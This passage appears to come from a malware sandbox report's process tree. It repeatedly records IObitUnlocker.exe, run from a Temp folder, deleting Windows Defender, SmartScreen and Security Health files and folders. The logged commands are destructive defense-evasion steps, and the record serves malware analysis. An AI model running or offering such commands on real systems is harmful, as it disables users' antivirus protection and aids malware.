Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6216
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6348
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7152
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7164
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7028
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6204
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1268
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2544
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6420
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6268
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 